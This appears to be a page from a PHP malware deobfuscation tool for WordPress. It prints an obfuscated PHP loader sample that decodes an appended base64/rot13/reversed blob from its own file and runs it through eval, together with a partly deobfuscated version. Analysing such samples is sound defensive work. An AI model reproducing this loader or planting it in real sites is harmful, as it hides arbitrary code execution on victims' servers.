PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php $L6CRgr=array(base64_decode("L3gvaQ=="),base64_decode("eA=="),base64_decode(strrev(str_rot13(explode(base64_decode("Pz4="),file_get_contents(FILE))[1]))));$L7CRgr = "a7bc7b53beaf0626a2e47268c849b484";preg_replace($L6CRgr[0],serialize(eval($L6CRgr[2])),$L6CRgr[1]);exit();?>=0UV78zMhyT...

Obfuscated php code

<?php $L6CRgr=array(base64_decode("L3gvaQ=="),base64_decode("eA=="),base64_decode(strrev(str_rot13(explode(base64_decode("Pz4="),file_get_contents(__FILE__))[1]))));$L7CRgr = "a7bc7b53beaf0626a2e47268c849b484";preg_replace($L6CRgr[0],serialize(eval($L6CRgr[2])),$L6CRgr[1]);exit();?>=0UV78zMhyTWt4zp1EKMlOlBcxlWgpPV6NlWHqPV/NFXjNwZjtUZtLPVm1zpyOUWbtPV6NFXtpPraNvBtpPqaNlCtxPZjVQZ4OQVzNlpgWKMjEPXbNlCtxFZjNQZ4OQVzNlpgWKMjEPXbNFChNloz5JnxNlBcpFYaNvBtplqaNlCtxvZjNQZ4OQVzNlpgWKMjEPXbNFChNloz5JnxNlBcpFYaNvBtpvpaNlCtxPAjNQZ4OQVzNlpgWKMjEPXbNFChNloz5JnxNlBcxlWgpPV6NlWGqPV/NFXjNQAjtUZtLPVm1zpyOUWbtPV6NFXtpPraNvBtplpaNlCtxPZjDQZ4OQVzNlpgWKMjEPXbNlCtxPBjNQZ4OQVzNlpgWKMjEPXbNFChNloz5JnxNlBcpFYaNvBtplqaNlCtxPZkNQZ4OQVzNlpgWKMjEPXbNFChNloz5JnxNlBcpFYaNvBtpvpaNlCtxPZlNQZ4OQVzNlpgWKMjEPXbNFChNloz5JnxNlBcxlWgpPV6NlWGqPV/NFXjNQBjtUZtLPVm1zpyOUWbtPV6NFXtpPraNvBtplpaNlCtxPZjtQZ4OQVzNlpgWKMjEPXbNlCtxPZ0NQZ4OQVzNlpgWKMjEPXbNFChNloz5JnxNlBcpFYaNvBtplqaNlCtxPZ4NQZ4OQVzNlpgWKMjEPXbNFChNloz5JnxNlBcpFYaNvBtpvpaNlCtxPZjRQZ4OQVzNlpgWKMjEPXbNFChNloz5JnxNFstfmW1qPV9Nloz5JnxNlrtH2pfITV9OlBaN3Wt0QViMzocEPV7OFXjNQZktUZt0GCtxPZjNGZ4OQVzNlpgWKMjEPXbNvMcI2pfITV9OlBaZ2Wt0QViMzocEPV7OFXjNQZltUZt0GCtxPZjNwZ4OQVzNlpgWKMjEPXbNvMcI2pfITV9OlBaD2Wt0QViMzocEPV7OFXjNQZ0tUZt0GCtxPZjNQA

Decoded(de-Obfuscated) php code

<?php

$L6CRgr = array("/x/i", "x", base64_decode(strrev(str_rot13(array(0 => "<?php \$L6CRgr=array(base64_decode(\"L3gvaQ==\"),base64_decode(\"eA==\"),base64_decode(strrev(str_rot13(explode(base64_decode(\"Pz4=\"),file_get_contents(__FILE__))[1]))));\$L7CRgr = \"a7bc7b53beaf0626a2e47268c849b484\";preg_replace(\$L6CRgr[0],serialize(eval(\$L6CRgr[2])),\$L6CRgr[1]);exit();", 1 => "=0UV78zMhyTWt4zp1EKMlOlBcxlWgpPV6NlWHqPV/NFXjNwZjtUZtLPVm1zpyOUWbtPV6NFXtpPraNvBtpPqaNlCtxPZjVQZ4OQVzNlpgWKMjEPXbNlCtxFZjNQZ4OQVzNlpgWKMjEPXbNFChNloz5JnxNlBcpFYaNvBtplqaNlCtxvZjNQZ4OQVzNlpgWKMjEPXbNFChNloz5JnxNlBcpFYaNvBtpvpaNlCtxPAjNQZ4OQVzNlpgWKMjEPXbNFChNloz5JnxNlBcxlWgpPV6NlWGqPV/NFXjNQAjtUZtLPVm1zpyOUWbtPV6NFXtpPraNvBtplpaNlCtxPZjDQZ4OQVzNlpgWKMjEPXbNlCtxPBjNQZ4OQVzNlpgWKMjEPXbNFChNloz5JnxNlBcpFYaNvBtplqaNlCtxPZkNQZ4OQVzNlpgWKMjEPXbNFChNloz5JnxNlBcpFYaNvBtpvpaNlCtxPZlNQZ4OQVzNlpgWKMjEPXbNFChNloz5JnxNlBcxlWgpPV6NlWGqPV/NFXjNQBjtUZtLPVm1zpyOUWbtPV6NFXtpPraNvBtplpaNlCtxPZjtQZ4OQVzNlpgWKMjEPXbNlCtxPZ0NQZ4OQVzNlpgWKMjEPXbNFChNloz5JnxNlBcpFYaNvBtplqaNlCtxPZ4NQZ4OQVzNlpgWKMjEPXbNFChNloz5JnxNlBcpFYaNvBtpvpaNlCtxPZjRQZ4OQVzNlpgWKMjEPXbNFChNloz5JnxNFstfmW1qPV9Nloz5JnxNlrtH2pfITV9OlBaN3Wt0QViMzocEPV7OFXjNQZktUZt0GCtxPZjNGZ4OQVzNlpgWKMjEPXbNvMcI2pfITV9OlBaZ2Wt0QViMzocEPV7OFXjNQZltUZt0GCtxPZjNwZ4OQVzNlpgWKMjEPXbNvMcI2pfITV9OlBaD2Wt0QViMzocEPV7OFXjNQZ0tUZt0GCtxPZjNQA")[1]))));
$L7CRgr = "a7bc7b53beaf0626a2e47268c849b484";
preg_replace($L6CRgr[0], serialize(eval($L6CRgr[2])), $L6CRgr[1]);
exit;

Malware detection & removal plugin for WordPress

PHP deobfuscation, decryption, reconstruction tool

<?php $L6CRgr=array(base64_decode("L3gvaQ=="),base64_decode("eA=="),base64_decode(strrev(str_rot13(explode(base64_decode("Pz4="),file_get_contents(__FILE__))[1]))));$L7CRgr = "a7bc7b53beaf0626a2e47268c849b484";preg_replace($L6CRgr[0],serialize(eval($L6CRgr[2])),$L6CRgr[1]);exit();?>=0UV78zMhyT...

Obfuscated php code

Decoded(de-Obfuscated) php code

<?php $L6CRgr=array(base64_decode("L3gvaQ=="),base64_decode("eA=="),base64_decode(strrev(str_rot13(explode(base64_decode("Pz4="),file_get_contents(FILE))[1]))));$L7CRgr = "a7bc7b53beaf0626a2e47268c849b484";preg_replace($L6CRgr[0],serialize(eval($L6CRgr[2])),$L6CRgr[1]);exit();?>=0UV78zMhyT...